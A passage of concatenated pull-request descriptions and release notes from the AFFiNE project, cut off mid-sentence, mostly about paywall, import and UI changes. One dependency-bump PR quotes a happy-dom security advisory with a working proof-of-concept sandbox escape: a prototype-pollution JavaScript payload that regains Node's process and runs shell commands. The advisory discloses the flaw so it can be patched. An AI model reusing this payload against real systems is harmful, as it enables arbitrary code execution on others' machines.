<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **New Features**
* Added a mutation to request/apply a subscription by transaction ID
(client mutation and server operation), returning subscription details.
* **Bug Fixes / Improvements**
* More robust external subscription sync with safer conflict detection,
optional short-lived confirmation, improved parsing and error logging.
* **Chores**
* Standardized time constants for clarity.
* **Tests**
* Updated subscription test data (expiration date) to reflect new
lifecycle expectations.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **Bug Fixes**
* Resolved cryptographic compatibility issues with OpenSSL 3.x.
* **New Features**
* Broader support for multiple key types for signing and verification.
* OTP generation adjusted (affects digit distribution/values).
* **Refactor**
* Internal cryptographic key handling reworked for improved stability,
compatibility, and multi-key-type support.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **New Features**
* Enhanced audio/video detection for MP4 files to better distinguish
audio-only vs. video.
* **Dependencies**
* Added MP4 parsing dependency and updated AI provider libraries
(Anthropic, Google, OpenAI, etc.).
* **Bug Fixes**
* Tightened authentication state validation for magic-link/OTP flows.
* Stricter space-join validation to reject invalid client
types/versions.
* Improved transcript entry deduplication and data handling.
* **API**
* Transcript submit payload now requires infos and removes deprecated
url/mimeType fields.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
This PR addresses issue Fixes: #13805 (cross-document copy/paste not
working).
Locally verified that:
- Copy → paste between two documents now works consistently.
- Clipboard snapshot payload remains intact when encoded/decoded.
- External paste (e.g., to Notepad or browser text field) functions
correctly.
E2E tests for clipboard behavior were added, but Playwright browsers
could not be installed in the container (`HTTP 403` from CDN).
Manual verification confirms the fix works as intended.
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **Tests**
* Added cross-document clipboard regression tests for copy/paste between
documents, external clipboard validation, and multi-block copy;
duplicate test entries noted.
* **Chores**
* Minor formatting and whitespace cleanup around clipboard handling.
* Improved error handling in paste flows.
* Standardized HTML formatting for clipboard payload attributes.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
**Context and Purpose:**
This PR automatically remediates a security vulnerability:
- **Description:** Service 'app' allows for privilege escalation via
setuid or setgid binaries. Add 'no-new-privileges:true' in
'security_opt' to prevent this.
- **Rule ID:**
yaml.docker-compose.security.no-new-privileges.no-new-privileges
- **Severity:** HIGH
- **File:** .devcontainer/docker-compose.yml
- **Lines Affected:** 4 - 4
This change is necessary to protect the application from potential
security risks associated with this vulnerability.
**Solution Implemented:**
The automated remediation process has applied the necessary changes to
the affected code in `.devcontainer/docker-compose.yml` to resolve the
identified issue.
Please review the changes to ensure they are correct and integrate as
expected.
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **Chores**
* Enhanced security configuration for the development environment.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **Performance**
* Added caching mechanism for subscription product data to reduce API
calls and improve response times.
* **Improvements**
* Enhanced asynchronous processing of subscription entitlements for more
reliable product data retrieval from the payment provider.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **New Features**
* Added SMTP name configuration field to notification settings.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
Hi 👋
Love what you're doing with AFFiNE, I found my Notion replacement in
this app. Coming from Notion and importing my workspaces, I saw the need
to improve the import functionality to replicate the folder hierarchy
from Notion into the AFFiNE folder structure in the `Organize` section.
There are a few issues(i.e. #12961 and #13629 ) of people that expected
the same behavior. This should make it a lot easier for people to move
over.
### Technical description
Improve Notion import functionality to preserve organizational structure
and page icons from exports:
- Add folder hierarchy preservation during Notion import
- Extract and set page icons (emoji and image) from Notion HTML
- Integrate with OrganizeService to recreate folder structure
- Use ExplorerIconService to apply page icons to imported documents
- Tested using production workspace exports from Notion, several
thousand pages and multiple hierarchy levels deep.
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
- New Features
- Imports from Notion/HTML now recreate folder hierarchies and link
imported pages into that structure.
- Page icons (emoji and supported images) are extracted and attached to
imported pages.
- Import results now include the created root folder for quick access.
- Improvements
- Import flows integrate folder creation and icon assignment with
non-blocking error handling.
- Bug Fixes
- Avoids including undefined page IDs in successful imports.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
---------
Co-authored-by: DarkSky <darksky2048@gmail.com>
Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
This PR updates the appearance of `embed-linked-doc-block` and
`embed-synced-doc-block` to reflect the trashed state of their linked
documents.
Previously, these blocks showed no visual difference whether the linked
document was trashed or not, despite the existing of codes for
deletion-related appearance.
This change ensures that the deletion appearance is properly displayed.
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **New Features**
* Documents now support trash state tracking for improved deletion
management
* **Bug Fixes**
* Improved synchronization and refresh of embedded documents when
document states change
* Enhanced handling of trashed documents in embedded content
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
## Issue
The Array::get method used verbose nested Option handling with redundant
returns, making the code longer and less Rust idiomatic.
## Solution
Replaced the nested if let structure with a functional and_then approach
that:
- Eliminates redundant return keyword usage
- Flattens Option handling for cleaner logic
- Reduces code from 13 lines to 9 lines
- Maintains identical functionality
## Result
More idiomatic Rust code that's easier to read and maintain, with all
tests passing.
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **Refactor**
* Improved internal code structure with functional programming patterns
for enhanced maintainability. No visible changes to end-user
functionality.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **New Features**
* Added a new Discord community link in the mobile settings Others
section with an animated "Hot" badge
* **Localization**
* Added multilingual support for the new Discord link across all
supported languages
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
This pull request integrates RevenueCat into the iOS paywall system,
enabling user authentication and subscription management through the
RevenueCat SDK. It introduces new dependencies, updates the paywall
plugin initialization, and adds logic to fetch and use the current user
identifier from the web context for RevenueCat login. The most important
changes are grouped below:
**RevenueCat Integration and Configuration:**
* Added `purchases-ios-spm` (RevenueCat) as a Swift Package dependency
in `AffinePaywall` and updated `Package.resolved` to track the new
dependency.
(`packages/frontend/apps/ios/App/Packages/AffinePaywall/Package.swift`,
`packages/frontend/apps/ios/App/App.xcworkspace/xcshareddata/swiftpm/Package.resolved`)
[[1]](diffhunk://#diff-7716c691e65a220dad542e024fbf91547c45ea69ddff1d0b6a002a497cd7c8ecR20-R28)
[[2]](diffhunk://#diff-63609de9bdfc08b8a0691a4f0ddb7ddff07ae76b40ec2ee7c12adb7db226eb3cR48-R56)
* Implemented `Paywall.setup()` for initializing RevenueCat
configuration, including setting log level, proxy URL, and a static API
key.
(`packages/frontend/apps/ios/App/Packages/AffinePaywall/Sources/AffinePaywall/Paywall.swift`,
`packages/frontend/apps/ios/App/Plugins/PayWall/PayWallPlugin.swift`)
[[1]](diffhunk://#diff-bce0a21a4e7695b7bf2430cd6b8a85fbc84124cc3be83f3288119992b7abb6cdR8-R30)
[[2]](diffhunk://#diff-1854d318d8fd8736d078f5960373ed440836263649a8193c8ee33e72a99424edR14)
**User Authentication and Subscription State:**
* Enhanced the paywall ViewModel logic to fetch the current user
identifier from the web context (`window.getCurrentUserIdentifier`),
configure RevenueCat, and log in the user before fetching subscription
state. Improved error handling and ensured external entitlement fetching
is robust.
(`packages/frontend/apps/ios/App/Packages/AffinePaywall/Sources/AffinePaywall/Model/ViewModel+Action.swift`)
[[1]](diffhunk://#diff-df2cb61867b4ff10dee98d534cf3c94fe8d48ebaef3f219450a9fba26725fdcbR9)
[[2]](diffhunk://#diff-df2cb61867b4ff10dee98d534cf3c94fe8d48ebaef3f219450a9fba26725fdcbL120-R155)
[[3]](diffhunk://#diff-df2cb61867b4ff10dee98d534cf3c94fe8d48ebaef3f219450a9fba26725fdcbR165)
* Added a global JavaScript function `getCurrentUserIdentifier` to the
iOS web context to retrieve the current user's account ID for use in
RevenueCat login. (`packages/frontend/apps/ios/src/app.tsx`)
**Project Metadata:**
* Downgraded the `objectVersion` in the Xcode project file, possibly to
maintain compatibility with other tools or environments.
(`packages/frontend/apps/ios/App/App.xcodeproj/project.pbxproj`)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **New Features**
* Paywall now initializes automatically for a smoother subscription
flow.
* New global API to retrieve the current user identifier from the app
context.
* **Improvements**
* Added integration to better coordinate subscription/login state before
showing paywall options.
* Ensures user identity is validated prior to entitlement checks,
improving accuracy.
* Improved error messages and logging during purchase/login flows.
* **Bug Fixes**
* Fixed intermittent issues where subscription status could fail to load
or appear outdated.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
This PR contains the following updates:
| Package | Change | Age | Confidence |
|---|---|---|---|
| [happy-dom](https://redirect.github.com/capricorn86/happy-dom) |
[`20.0.0` ->
`20.0.2`](https://renovatebot.com/diffs/npm/happy-dom/20.0.0/20.0.2) |
[](https://docs.renovatebot.com/merge-confidence/)
|
[](https://docs.renovatebot.com/merge-confidence/)
|
### GitHub Vulnerability Alerts
####
[CVE-2025-62410](https://redirect.github.com/capricorn86/happy-dom/security/advisories/GHSA-qpm2-6cq5-7pq5)
### Summary
The mitigation proposed in GHSA-37j7-fg3j-429f for disabling
eval/Function when executing untrusted code in happy-dom does not
suffice, since it still allows prototype pollution payloads.
### Details
The untrusted script and the rest of the application still run in the
same Isolate/process, so attackers can deploy prototype pollution
payloads to hijack important references like "process" in the example
below, or to hijack control flow via flipping checks of undefined
property. There might be other payloads that allow the manipulation of
require, e.g., via (univeral) gadgets
(https://www.usenix.org/system/files/usenixsecurity23-shcherbakov.pdf).
### PoC
Attackers can pollute builtins like Object.prototype.hasOwnProperty() to
obtain important references at runtime, e.g., "process". In this way,
attackers might be able to execute arbitrary commands like in the
example below via spawn().
```js
import { Browser } from "happy-dom";
const browser = new Browser({settings: {enableJavaScriptEvaluation: true}});
const page = browser.newPage({console: true});
page.url = 'https://example.com';
let payload = 'spawn_sync = process.binding(`spawn_sync`);normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(` `);typeof a.shell===`string`?c=a.shell:c=`/bin/sh`,b=[`-c`,g];}typeof a.argv0===`string`?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+`=`+d[f]);return{file:c,args:b,options:a,envPairs:e};};spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:`pipe`,readable:!0,writable:!1},{type:`pipe`,readable:!1,writable:!0},{type:`pipe`,readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c<a.stdio.length;c++){var e=a.stdio[c]&&a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}}var b=spawn_sync.spawn(a);if(b.output&&a.encoding&&a.encoding!==`buffer`)for(c=0;c<b.output.length;c++){if(!b.output[c])continue;b.output[c]=b.output[c].toString(a.encoding);}return b.stdout=b.output&&b.output[1],b.stderr=b.output&&b.output[2],b.error&&(b.error= b.error + `spawnSync `+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)),b;};'
page.content = `<html>
<script>
function f() { let process = this; ${payload}; spawnSync("touch", ["success.flag"]); return "success";}
this.constructor.constructor.__proto__.__proto__.toString = f;
this.constructor.constructor.__proto__.__proto__.hasOwnProperty = f;
// Other methods that can be abused this way: isPrototypeOf, propertyIsEnumerable, valueOf
</script>
<body>Hello world!</body></html>`;
await browser.close();
console.log(`The process object is ${process}`);
console.log(process.hasOwnProperty('spawn'));
```
### Impact
Arbitrary code execution via breaking out of the Node.js' vm isolation.
### Recommended Immediate Actions
Users can freeze the builtins in the global scope to defend against
attacks similar to the PoC above. However, the untrusted code might
still be able to retrieve all kind of information available in the
global scope and exfiltrate them via fetch(), even without prototype
pollution capabilities. Not to mention side channels caused by the
shared process/isolate. Migration to
[isolated-vm](https://redirect.github.com/laverdet/isolated-vm) is
suggested instead.
Cris from the Endor Labs Security Research Team, who has worked
extensively on JavaScript sandboxing in the past, submitted this
advisory.
---
### Release Notes
<details>
<summary>capricorn86/happy-dom (happy-dom)</summary>
###
[`v20.0.2`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v20.0.2)
[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v20.0.1...v20.0.2)
##### :construction\_worker\_man: Patch fixes
- Adds frozen intrinsics flag to workers in `@happy-dom/server-renderer`
- By **[@​capricorn86](https://redirect.github.com/capricorn86)**
in task
[#​1934](https://redirect.github.com/capricorn86/happy-dom/issues/1934)
###
[`v20.0.1`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v20.0.1)
[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v20.0.0...v20.0.1)
##### :construction\_worker\_man: Patch fixes
- Adds warning for environment with unfrozen intrinsics (builtins) when
JavaScript evaluation is enabled- By
**[@​capricorn86](https://redirect.github.com/capricorn86)** in
task
[#​1932](https://redirect.github.com/capricorn86/happy-dom/issues/1932)
- A security advisory has been reported showing that the recommended
preventive measure of running Node.js with
`--disallow-code-generation-from-strings` wasn't enough to protect
against attackers escaping the VM context and accessing process-level
functions. Big thanks to
[@​cristianstaicu](https://redirect.github.com/cristianstaicu) for
reporting this!
- The documentation for how to run Happy DOM with JavaScript evaluation
enabled in a safer way has been updated. Read more about it in the
[Wiki](https://redirect.github.com/capricorn86/happy-dom/wiki/JavaScript-Evaluation-Warning)
</details>
---
### Configuration
📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xNDMuMSIsInVwZGF0ZWRJblZlciI6IjQxLjE1Ni4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Close https://github.com/toeverything/AFFiNE/issues/13750
#### PR Dependency Tree
* **PR #13762** 👈
This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **New Features**
* Optional block properties are now supported (e.g., flat-table), with
default values applied automatically when not set.
* **Bug Fixes**
* More reliable initialization and syncing of block properties, ensuring
defaults appear consistently.
* Change notifications now correctly reflect updates to
optional/defaulted properties.
* **Tests**
* Added tests verifying optional property behavior, default application,
syncing, and change events.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
#### PR Dependency Tree
* **PR #13762** 👈
This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)
Close https://github.com/toeverything/AFFiNE/issues/13754
#### PR Dependency Tree
* **PR #13763** 👈
This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **Style**
* Updated page layout sizing to no longer force full-height on the docs
body, allowing height to adapt to content.
* Improves natural scrolling and reduces layout constraints in the
workspace “All” page.
* Enhances responsiveness across varying screen sizes by relying on
content and container sizing rules.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
#### PR Dependency Tree
* **PR #13740** 👈
This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **Bug Fixes**
* Improved reliability of updating block alignment when the current
selection isn’t explicitly defined. The editor now retrieves the
selection more consistently, reducing cases where alignment controls
appeared unresponsive or had no effect.
* Covers scenarios during initialization or edge cases where selection
was previously missed, resulting in smoother editing and fewer false
negatives when applying alignment.
* No changes to visible UI or shortcuts; behavior is simply more
consistent.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **Style**
* Refined vertical spacing in the document icon picker header, reducing
excess top padding and setting a consistent bottom padding for a
cleaner, tighter layout.
* Improves visual alignment and readability without altering
functionality—interactions and behavior remain unchanged.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **Bug Fixes**
* Resolved occasional errors when removing document links from sessions,
ensuring cleanup completes reliably.
* Improved reliability during maintenance actions by preventing
unnecessary validation failures in system-initiated updates, while
preserving existing checks for user-initiated changes.
* **Chores**
* Internal adjustments to the session update flow to better support
maintenance operations without affecting user-facing behavior.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **Style**
* Updated document title styling for improved readability (larger font,
increased line height, heavier weight).
* Refined spacing so titles align correctly when a document icon is
present (no extra top padding).
* Improved emoji rendering by using a consistent font and removing an
unnecessary visual artifact.
* Simplified title container behavior to ensure stable, predictable
alignment without placeholder-based shifts.
* **Chores**
* Minor UI cleanup and consistency adjustments for the icon/title area.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
This pull request makes minor adjustments to the iOS frontend app,
focusing on UI fine-tuning and improving type safety for concurrency.
The most notable changes are a small font size adjustment in the paywall
badge, marking an enum as `Sendable` for safer concurrency, and removing
a StoreKit configuration reference from the Xcode scheme.
UI adjustments:
* Reduced the font size for the badge text in `PackageOptionView` from
12 to 10 for a more refined appearance.
Concurrency and type safety:
* Added the `Sendable` protocol conformance to the `SKUnitCategory` enum
to ensure it can be safely used across concurrency boundaries.
Project configuration:
* Removed the `StoreKitConfigurationFileReference` from the
`App.xcscheme`, which may help streamline scheme configuration or
prevent unnecessary StoreKit file usage during app launch.
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
- Style
- Tweaked paywall option badge text size for a cleaner, more polished
look.
- Refactor
- Improved concurrency safety in underlying models to enhance stability.
- Chores
- Removed a development-only StoreKit configuration from the iOS debug
launch setup.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **New Features**
* Automatic email verification when signing in or reconnecting with a
linked OAuth provider: if the provider confirms the same email and your
account was unverified, your email will be marked as verified
automatically.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
When searching on a mobile device, the search modal is wider than the
screen, making it hard to use
<img width="345" height="454" alt="Screenshot 2025-10-04 at 17 43 54"
src="https://github.com/user-attachments/assets/10594459-86c5-470b-a22f-578363694383"
/>
Now with the fix applied, it is usable
<img width="350" height="454" alt="Screenshot 2025-10-04 at 17 44 14"
src="https://github.com/user-attachments/assets/eb783f5b-e3b6-4b7d-8f31-0d876911d95f"
/>
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
- **Style**
- Improved mobile responsiveness of the Quick Search modal. On screens
520px wide or smaller, the modal content now adapts its width instead of
enforcing a minimum, reducing overflow and improving readability on
small devices.
- No visual or behavioral changes on larger screens; existing layouts
and interactions remain unchanged.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
- New Features
- Added an alternative icon rendering option for document icons,
delivering crisper visuals and consistent emoji/icon display.
- Style
- Improved icon alignment and sizing within grouped icon buttons for
more consistent centering and appearance.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
Co-authored-by: Wu Yue <akumatus@gmail.com>
- Remove fixed marginTop from emoji container style
- Dynamically calculate emoji marginTop based on first child block type
(h1-h6)
- Use model signal to reactively update spacing when children change
- Default to 10px for non-heading blocks
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
- Style
- Improved emoji alignment in callout blocks. The emoji now adjusts its
top spacing based on the first line’s heading level, ensuring better
vertical alignment with headings (H1–H6) and more consistent visual
balance across different callout contents.
- Maintains existing margins and layout behavior otherwise, resulting in
a cleaner, more polished appearance without affecting functionality.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
- **New Features**
- Safer, consistent file downloads with automatic attachment headers and
filenames.
- Smarter MIME detection for uploads (avatars, workspace blobs, Copilot
files/transcripts).
- Sensible default buffer limit when reading uploads.
- **Bug Fixes**
- Prevents risky content from rendering inline by forcing downloads and
adding no‑sniff protection.
- More accurate content types when original metadata is missing or
incorrect.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
This pull request introduces significant improvements to the integration
between the paywall feature and the web context within the iOS app. The
main focus is on enabling synchronization of subscription states between
the app and the embedded web view, refactoring how purchased items are
managed, and enhancing the paywall presentation logic. Additionally,
some debug-only code has been removed for cleaner production builds.
**Paywall and Web Context Integration**
* Added support for binding a `WKWebView` context to the paywall,
allowing the paywall to communicate with the web view for subscription
state updates and retrievals (`Paywall.presentWall` now accepts a
`bindWebContext` parameter, and `ViewModel` supports binding and using
the web context).
[[1]](diffhunk://#diff-bce0a21a4e7695b7bf2430cd6b8a85fbc84124cc3be83f3288119992b7abb6cdR10-R32)
[[2]](diffhunk://#diff-cb192a424400265435cb06d86b204aa17b4e8195d9dd811580f51faeda211ff0R54-R57)
[[3]](diffhunk://#diff-cb192a424400265435cb06d86b204aa17b4e8195d9dd811580f51faeda211ff0L26-R38)
[[4]](diffhunk://#diff-1854d318d8fd8736d078f5960373ed440836263649a8193c8ee33e72a99424edL30-R36)
* On paywall dismissal, the app now triggers a JavaScript call to update
the subscription state in the web view, ensuring consistency between the
app and the web context.
**Purchased Items Refactor**
* Refactored `ViewModel` to distinguish between store-purchased items
and externally-purchased items (from the web context), and unified them
in a computed `purchasedItems` property. This improves clarity and
extensibility for handling entitlements from multiple sources.
* Added logic to fetch external entitlements by executing JavaScript in
the web view and decoding the subscription information, mapping external
plans to internal product identifiers.
[[1]](diffhunk://#diff-df2cb61867b4ff10dee98d534cf3c94fe8d48ebaef3f219450a9fba26725fdcbL99-R137)
[[2]](diffhunk://#diff-df2cb61867b4ff10dee98d534cf3c94fe8d48ebaef3f219450a9fba26725fdcbR169-R209)
**Codebase Cleanup**
* Removed debug-only code for shake gesture and debug menu from
`AFFiNEViewController`, streamlining the production build.
**API and Model Enhancements**
* Made `SKUnitCategory` and its extensions public to allow broader usage
across modules, and introduced a configuration struct for the paywall.
[[1]](diffhunk://#diff-742ccf0c6bafd2db6cb9795382d556fbab90b8855ff38dc340aa39318541517dL10-R17)
[[2]](diffhunk://#diff-bce0a21a4e7695b7bf2430cd6b8a85fbc84124cc3be83f3288119992b7abb6cdR10-R32)
**Other Minor Improvements**
* Improved constructor formatting for `PayWallPlugin` for readability.
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
- New Features
- Paywall now binds to the in-app web view so web-based subscriptions
are recognized alongside App Store purchases.
- Bug Fixes
- Entitlements combine App Store and web subscription state for more
accurate display.
- Dismissing the paywall immediately updates subscription status to
reduce stale states.
- Improved reliability when presenting the paywall.
- Chores
- Removed debug shake menu and debug paywall options from iOS builds.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
In the settings dialog, when switching between different setting items,
the right-side content retains the previous scroll position. I think it
would be better for the right side to return to the top every time a
switch is made, so I submitted this PR.
**before**
https://github.com/user-attachments/assets/a2d10601-6173-41d3-8d68-6fbccc62aaa7
**after**
https://github.com/user-attachments/assets/f240348b-e131-4703-8232-1a07e924162d
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **Bug Fixes**
* Ensured the settings dialog always scrolls to the top when the
settings state updates, improving user experience when navigating
settings.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
<img width="576" height="251" alt="截屏2025-09-30 14 55 20"
src="https://github.com/user-attachments/assets/947a4ab3-8b34-434d-94a6-afb5dad3d32c"
/>
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
- **New Features**
- Added “Subscribe to AI” action across chat experiences (panel,
content, composer, input, playground, peek view) that launches an in-app
checkout flow.
- Chat content now refreshes subscription status when opened; desktop
chat pages wire the subscription action for seamless checkout.
- **Style**
- Polished hover state for the subscription icon in chat preferences.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
- New Features
- Added on-demand subscription refresh and state retrieval in the iOS
app, enabling up-to-date subscription status and billing information.
- Exposed lightweight runtime APIs to check and update subscription
state for improved account visibility.
- Chores
- Integrated shared GraphQL package and project references to support
subscription operations.
- Updated workspace configuration to include the common GraphQL module
for the iOS app.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **New Features**
* Copilot now defaults to the updated Claude Sonnet 4.5 model across
experiences for improved responses.
* **Chores**
* Consolidated available Anthropic models, removing older Sonnet 3.x
variants and standardizing Sonnet 4/4.5 options.
* Updated configuration defaults and schema mappings to reference the
new Sonnet 4.5 model.
* **Tests**
* Updated unit and end-to-end tests to reference the new model to ensure
consistent behavior.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
- New Features
- Revamped Emoji Picker: grouped browsing with sticky group headers,
footer navigation, and a new EmojiButton for quicker selection.
- Recent emojis with persisted history and single-tap add.
- Programmatic group navigation and callbacks for sticky-group changes.
- Style
- Updated scroll area paddings for emoji and icon pickers.
- Enhanced group header background for better contrast.
- Refactor
- Simplified emoji picker internals for leaner, more responsive
rendering.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **New Features**
* The AI Artifact Tool now auto-opens its preview panel as soon as it
loads, giving immediate visibility without extra clicks.
* The preview initializes proactively and remains in sync as data
updates, streamlining the workflow and reducing setup friction.
* Improves first-use experience by ensuring the preview is ready and
visible on connection, enhancing responsiveness and clarity.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **New Features**
* Added an on-demand mutation to refresh the current user's
subscriptions, syncing with RevenueCat when applicable and handling
Stripe-only cases.
* Subscription variant normalization for clearer plan information and
consistent results.
* **Tests**
* Added tests for refresh behavior: empty state, RevenueCat-backed
multi-step sync, and Stripe-only scenarios.
* **Client**
* New client operation to invoke the refresh mutation and retrieve
updated subscription fields.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **New Features**
* In-tree icon picker for Callout blocks (emoji, app icons, images) with
popup UI and editor-wide extension/service.
* Callout toolbar adds background color presets, an icon-picker action,
and a destructive Delete action.
* **Refactor**
* Replaced legacy emoji workflow with icon-based rendering, updated
state, styling, and lifecycle for callouts.
* **Tests**
* Updated callout E2E to reflect new default icon and picker behavior.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
---------
Co-authored-by: L-Sun <zover.v@gmail.com>
This pull request introduces several improvements and refactors to the
iOS frontend, with a focus on the paywall system, configuration, and
developer experience. The most significant changes include dynamic
pricing updates for subscription packages, the introduction of a
centralized pricing configuration, and enhanced developer documentation
and settings for Claude Code. There are also minor fixes and
improvements to restore purchase flows, App Store syncing, and protocol
usage guidance.
**Paywall System Improvements**
* Subscription package pricing and display is now dynamically updated
based on App Store data, ensuring users see accurate, localized pricing
and descriptions. This includes new logic for calculating monthly prices
and updating package button text. (`ViewModel.swift`,
`ViewModel+Action.swift`, `SKUnit+Pro.swift`, `SKUnit+AI.swift`)
[[1]](diffhunk://#diff-cb192a424400265435cb06d86b204aa17b4e8195d9dd811580f51faeda211ff0R83-R160)
[[2]](diffhunk://#diff-cb192a424400265435cb06d86b204aa17b4e8195d9dd811580f51faeda211ff0L102-R199)
[[3]](diffhunk://#diff-df2cb61867b4ff10dee98d534cf3c94fe8d48ebaef3f219450a9fba26725fdcbL58-R73)
[[4]](diffhunk://#diff-df2cb61867b4ff10dee98d534cf3c94fe8d48ebaef3f219450a9fba26725fdcbL74-R94)
[[5]](diffhunk://#diff-ea535c02550f727587e74521da8fd90dec23cbe3c685f9c4aa4923ce0bbdb363L19-R35)
[[6]](diffhunk://#diff-a5fef660f959bbb52ce3f19bba8bfbd0bb00d66c9f18a20a998101b5df6c8f60L18-R22)
* Introduced a new `PricingConfiguration.swift` file to centralize
product identifiers, default selections, and display strings for
